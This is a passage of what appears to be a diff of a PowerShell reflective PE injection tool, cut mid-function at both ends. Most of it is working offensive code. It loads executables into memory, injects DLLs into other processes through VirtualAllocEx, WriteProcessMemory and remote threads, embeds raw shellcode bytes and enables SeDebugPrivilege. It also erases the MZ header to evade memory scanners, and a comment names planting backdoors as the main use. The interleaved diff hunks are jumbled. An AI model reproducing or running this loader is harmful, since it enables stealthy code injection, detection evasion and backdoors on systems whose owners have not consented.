crash." + Throw "Unable to get the handle to the current thread" } - if ($ForceASLR -and $RemoteLoading) + [IntPtr]$ThreadToken = [IntPtr]::Zero + [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) + if ($Result -eq $false) { - Write-Error "Cannot use ForceASLR when loading in to a remote process." -ErrorAction Stop + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN) + { + $Result = $Win32Functions.ImpersonateSelf.Invoke(3) + if ($Result -eq $false) + { + Throw "Unable to impersonate self" + } + + $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) + if ($Result -eq $false) + { + Throw "Unable to OpenThreadToken." + } + } + else + { + Throw "Unable to OpenThreadToken. Error code: $ErrorCode" + } } - if ($RemoteLoading -and (-not $PESupportsASLR)) + + [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID)) + $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid) + if ($Result -eq $false) { - Write-Error "PE doesn't support ASLR. Cannot load a non-ASLR PE in to a remote process" -ErrorAction Stop + Throw "Unable to call LookupPrivilegeValue" } - $PEHandle = [IntPtr]::Zero #This is where the PE is allocated in PowerShell - $EffectivePEHandle = [IntPtr]::Zero #This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process. - if ($RemoteLoading -eq $true) - { - #Allocate space in the remote process, and also allocate space in PowerShell. The PE will be setup in PowerShell and copied to the remote process when it is setup - $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) - - #todo, error handling needs to delete this memory if an error happens along the way - $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) - if ($EffectivePEHandle -eq [IntPtr]::Zero) - { - Throw "Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use" - } - } - else - { - if ($NXCompatible -eq $true) - { - $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) - } - else - { - $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) - } - $EffectivePEHandle = $PEHandle - } - - [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage) - if ($PEHandle -eq [IntPtr]::Zero) - { - Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)." - } - [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null - - - #Now that the PE is in memory, get more detailed information about it - Write-Verbose "Getting detailed PE information from the headers loaded in memory" - $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants - $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress - $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle - Write-Verbose "StartAddress: $(Get-Hex $PEHandle) EndAddress: $(Get-Hex $PEEndAddress)" - - - #Copy each section from the PE in to memory - Write-Verbose "Copy PE sections in to memory" - Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types - - - #Update the memory addresses hardcoded in to the PE based on the memory address the PE was expecting to be loaded to vs where it was actually loaded - Write-Verbose "Update memory addresses based on where the PE was actually loaded in memory" - Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types - - - #The PE we are in-memory loading has DLLs it needs, import those DLLs for it - Write-Verbose "Import DLL's needed by the PE we are loading" - if ($RemoteLoading -eq $true) - { - Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle - } - else - { - Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants - } - - - #Update the memory protection flags for all the memory just allocated - if ($RemoteLoading -eq $false) - { - if ($NXCompatible -eq $true) - { - Write-Verbose "Update memory protection flags" - Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types - } - else - { - Write-Verbose "PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute" - } - } - else - { - Write-Verbose "PE being loaded in to a remote process, not adjusting memory permissions" - } - - - #If remote loading, copy the DLL in to remote process memory - if ($RemoteLoading -eq $true) - { - [UInt32]$NumBytesWritten = 0 - $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten) - if ($Success -eq $false) - { - Throw "Unable to write shellcode to remote process memory." - } - } - - - #Call the entry point, if this is a DLL the entrypoint is the DllMain function, if it is an EXE it is the Main function - if ($PEInfo.FileType -ieq "DLL") - { - if ($RemoteLoading -eq $false) - { - Write-Verbose "Calling dllmain so the DLL knows it has been loaded" - $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) - $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool]) - $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate) - - $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null - } - else - { - $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) - - if ($PEInfo.PE64Bit -eq $true) - { - #Shellcode: CallDllMain.asm - $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9) - $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8) - $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3) - } - else - { - #Shellcode: CallDllMain.asm - $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9) - $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8) - $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3) - } - $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2) - $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) - $SCPSMemOriginal = $SCPSMem - - Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false) - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) - Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false) - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) - Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length) - - $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) - if ($RSCAddr -eq [IntPtr]::Zero) - { - Throw "Unable to allocate memory in the remote process for shellcode" - } - - $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) - if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) - { - Throw "Unable to write shellcode to remote process memory." - } - - $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions - $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) - if ($Result -ne 0) - { - Throw "Call to CreateRemoteThread to call GetProcAddress failed." - } - - $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null - } - } - elseif ($PEInfo.FileType -ieq "EXE") - { - #Overwrite GetCommandLine and ExitProcess so we can provide our own arguments to the EXE and prevent it from killing the PS process - [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1) - [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00) - $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr - - #If this is an EXE, call the entry point in a new thread. We have overwritten the ExitProcess function to instead ExitThread - # This way the reflectively loaded EXE won't kill the powershell process when it exits, it will just kill its own thread. - [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) - Write-Verbose "Call EXE Main function. Address: $(Get-Hex $ExeMainPtr). Creating thread for the EXE to run in." - - $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null - - while($true) - { - [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0) - if ($ThreadDone -eq 1) - { - Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants - Write-Verbose "EXE thread has completed." - break - } - else - { - Start-Sleep -Seconds 1 - } - } - } - - return @($PEInfo.PEHandle, $EffectivePEHandle) - } - - - Function Invoke-MemoryFreeLibrary - { - Param( - [Parameter(Position=0, Mandatory=$true)] - [IntPtr] - $PEHandle - ) - - #Get Win32 constants and functions - $Win32Constants = Get-Win32Constants - $Win32Functions = Get-Win32Functions - $Win32Types = Get-Win32Types - - $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants - - #Call FreeLibrary for all the imports of the DLL - if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0) - { - [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress) - - while ($true) - { - $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR) - - #If the structure is null, it signals that this is the end of the array - if ($ImportDescriptor.Characteristics -eq 0 ` - -and $ImportDescriptor.FirstThunk -eq 0 ` - -and $ImportDescriptor.ForwarderChain -eq 0 ` - -and $ImportDescriptor.Name -eq 0 ` - -and $ImportDescriptor.TimeDateStamp -eq 0) - { - Write-Verbose "Done unloading the libraries needed by the PE" - break - } - - $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))) - $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath) - - if ($ImportDllHandle -eq $null) - { - Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue - } - - $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle) - if ($Success -eq $false) - { - Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue - } - - $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)) - } - } - - #Call DllMain with process detach - Write-Verbose "Calling dllmain so the DLL knows it is being unloaded" - $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) - $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool]) - $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate) - - $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null - - - $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) - if ($Success -eq $false) - { - Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue - } - } - - - Function Main - { - $Win32Functions = Get-Win32Functions - $Win32Types = Get-Win32Types - $Win32Constants = Get-Win32Constants - - $RemoteProcHandle = [IntPtr]::Zero - - #If a remote process to inject in to is specified, get a handle to it - if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne "")) - { - Throw "Can't supply a ProcId and ProcName, choose one or the other" - } - elseif ($ProcName -ne $null -and $ProcName -ne "") - { - $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue) - if ($Processes.Count -eq 0) - { - Throw "Can't find process $ProcName" - } - elseif ($Processes.Count -gt 1) - { - $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId - Write-Output $ProcInfo - Throw "More than one instance of $ProcName found, please specify the process ID to inject in to." - } - else - { - $ProcId = $Processes[0].ID - } - } - - #Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future. - #If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege -# if ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId) -# { -# Write-Verbose "Getting SeDebugPrivilege" -# Enable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -# } - - if (($ProcId -ne $null) -and ($ProcId -ne 0)) - { - $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId) - if ($RemoteProcHandle -eq [IntPtr]::Zero) - { - Throw "Couldn't obtain the handle for process ID: $ProcId" - } - - Write-Verbose "Got the handle for the remote process to inject in to" - } - - - #Load the PE reflectively - Write-Verbose "Calling Invoke-MemoryLoadLibrary" - $PEHandle = [IntPtr]::Zero - if ($RemoteProcHandle -eq [IntPtr]::Zero) - { - $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -ForceASLR $ForceASLR - } - else - { - $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle -ForceASLR $ForceASLR - } - if ($PELoadedInfo -eq [IntPtr]::Zero) - { - Throw "Unable to load PE, handle returned is NULL" - } - - $PEHandle = $PELoadedInfo[0] - $RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process - - - #Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function. - $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants - if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero)) - { - ######################################### - ### YOUR CODE GOES HERE - ######################################### - switch ($FuncReturnType) - { - 'WString' { - Write-Verbose "Calling function with WString return type" - [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "WStringFunc" - if ($WStringFuncAddr -eq [IntPtr]::Zero) - { - Throw "Couldn't find function address." - } - $WStringFuncDelegate = Get-DelegateType @() ([IntPtr]) - $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate) - [IntPtr]$OutputPtr = $WStringFunc.Invoke() - $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr) - Write-Output $Output - } - - 'String' { - Write-Verbose "Calling function with String return type" - [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "StringFunc" - if ($StringFuncAddr -eq [IntPtr]::Zero) - { - Throw "Couldn't find function address." - } - $StringFuncDelegate = Get-DelegateType @() ([IntPtr]) - $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate) - [IntPtr]$OutputPtr = $StringFunc.Invoke() - $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr) - Write-Output $Output - } - - 'Void' { - Write-Verbose "Calling function with Void return type" - [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc" - if ($VoidFuncAddr -eq [IntPtr]::Zero) - { - Throw "Couldn't find function address." - } - $VoidFuncDelegate = Get-DelegateType @() ([Void]) - $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate) - $VoidFunc.Invoke() | Out-Null - } - } - ######################################### - ### END OF YOUR CODE - ######################################### - } - #For remote DLL injection, call a void function which takes no parameters - elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero)) - { - $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc" - if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero)) - { - Throw "VoidFunc couldn't be found in the DLL" - } - - $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle - $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle - - #Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors - $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions - } - - #Don't free a library if it is injected in a remote process or if it is an EXE. - #Note that all DLL's loaded by the EXE will remain loaded in memory. - if ($RemoteProcHandle -eq [IntPtr]::Zero -and $PEInfo.FileType -ieq "DLL") - { - Invoke-MemoryFreeLibrary -PEHandle $PEHandle - } - else - { - #Delete the PE file from memory. - $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) - if ($Success -eq $false) - { - Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue - } - } - - Write-Verbose "Done!" - } - - Main -} + [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES) + [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize) + $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES) + $TokenPrivileges.PrivilegeCount = 1 + $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID) + $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED + [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true) + + $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero) + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value + if (($Result -eq $false) -or ($ErrorCode -ne 0)) + { + #Throw "Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode" #todo need to detect if already set + } -#Main function to either run the script locally or remotely -Function Main -{ - if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent) - { - $DebugPreference = "Continue" - } - - Write-Verbose "PowerShell ProcessID: $PID" - - #Verify the image is a valid PE file - $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join '' + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem) + } - if ($e_magic -ne 'MZ') + Function Create-RemoteThread { - throw 'PE is not a valid PE file.' + Param( + [Parameter(Position = 1, Mandatory = $true)] + [IntPtr] + $ProcessHandle, + + [Parameter(Position = 2, Mandatory = $true)] + [IntPtr] + $StartAddress, + + [Parameter(Position = 3, Mandatory = $false)] + [IntPtr] + $ArgumentPtr = [IntPtr]::Zero, + + [Parameter(Position = 4, Mandatory = $true)] + [System.Object] + $Win32Functions + ) + + [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero + + $OSVersion = [Environment]::OSVersion.Version + #Vista and Win7 + if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2))) + { + #Write-Verbose "Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress" + $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero) + $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + if ($RemoteThreadHandle -eq [IntPtr]::Zero) + { + Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError" + } + } + #XP/Win8 + else + { + #Write-Verbose "Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress" + $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero) + } + + if ($RemoteThreadHandle -eq [IntPtr]::Zero) + { + Write-Error "Error creating remote thread, thread handle is null" -ErrorAction Stop + } + + return $RemoteThreadHandle } - if (-not $DoNotZeroMZ) { - # Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg - # TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be. - $PEBytes[0] = 0 - $PEBytes[1] = 0 - } - - #Add a "program name" to exeargs, just so the string looks as normal as possible (real args start indexing at 1) - if ($ExeArgs -ne $null -and $ExeArgs -ne '') - { - $ExeArgs = "ReflectiveExe $ExeArgs" - } - else - { - $ExeArgs = "ReflectiveExe" - } - - if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$") - { - Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) - } - else - { - Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName - } + Function Get-ImageNtHeaders + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [IntPtr] + $PEHandle, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Types + ) + + $NtHeadersInfo = New-Object System.Object + + #Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness + $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER) + + #Get IMAGE_NT_HEADERS + [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew)) + $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr + $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64) + + #Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen. + if ($imageNtHeaders64.Signature -ne 0x00004550) + { + throw "Invalid IMAGE_NT_HEADER signature." + } + + if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC') + { + $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64 + $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true + } + else + { + $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32) + $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32 + $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false + } + + return $NtHeadersInfo + } + + + #This function will get the information needed to allocated space in memory for the PE + Function Get-PEBasicInfo + { + Param( + [Parameter( Position = 0, Mandatory = $true )] + [Byte[]] + $PEBytes, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Types + ) + + $PEInfo = New-Object System.Object + + #Write the PE to memory temporarily so I can get information from it. This is not it's final resting spot. + [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length) + [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null + + #Get NtHeadersInfo + $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types + + #Build a structure with the information which will be needed for allocating memory and writing the PE to memory + $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit) + $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase) + $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage) + $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders) + $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics) + + #Free the memory allocated above, this isn't where we allocate the PE to memory + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes) + + return $PEInfo + } + + + #PEInfo must contain the following NoteProperties: + # PEHandle: An IntPtr to the address the PE is loaded to in memory + Function Get-PEDetailedInfo + { + Param( + [Parameter( Position = 0, Mandatory = $true)] + [IntPtr] + $PEHandle, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Types, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Constants + ) + + if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero) + { + throw 'PEHandle is null or IntPtr.Zero' + } + + $PEInfo = New-Object System.Object + + #Get NtHeaders information + $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types + + #Build the PEInfo object + $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle + $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS) + $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr) + $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit) + $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage) + + if ($PEInfo.PE64Bit 